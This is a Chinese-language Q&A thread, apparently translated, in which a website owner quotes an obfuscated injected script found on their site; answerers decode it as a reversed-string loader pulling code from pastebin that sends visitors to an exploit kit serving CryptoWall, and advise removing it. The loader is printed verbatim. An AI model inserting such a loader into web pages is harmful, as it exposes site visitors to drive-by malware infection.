我最近在我的网站上发现了以下代码
<script type=""text/javascript"">
document.write('>tpircs/<>""YWVPsGmx=i?php.war/moc.nibetsap//:ptth""=crs tpircs<'.split("""").reverse().join(""""))
</script>
这段代码有什么作用?我是 XSS 的受害者吗?我的托管公司有什么可以做的吗,例如恶意软件扫描程序等?
【问题讨论】:
标签: javascript web malware
这是一个指向 Exploit Kit 的重定向代码。实际的 URL 是
pastebin[.]com/raw[.]php?i=xmGsPVWY ---> trak[masked].co.in/js
请从您服务器上托管的所有页面中删除此代码。
【讨论】:
该文本被反转以形成一个 pastebin 链接 - 该 pastebin 处的脚本已加载并在浏览器中与您的站点代码的其余部分一起运行。
【讨论】:
hacked.php 的文件,其中插入了类似的脚本标签。
您的网站已被入侵(被黑)并被注入了该恶意 javascript 代码。
它使用多种重定向/编码方法,但最终会将您的访问者推送到 Angler EK(漏洞利用工具包),然后尝试将 CryptoWall 集中在您的用户身上。
您可以尝试在这里扫描:
http://www.unmaskparasites.com/
查找有关恶意软件的更多详细信息。
谢谢,
【讨论】: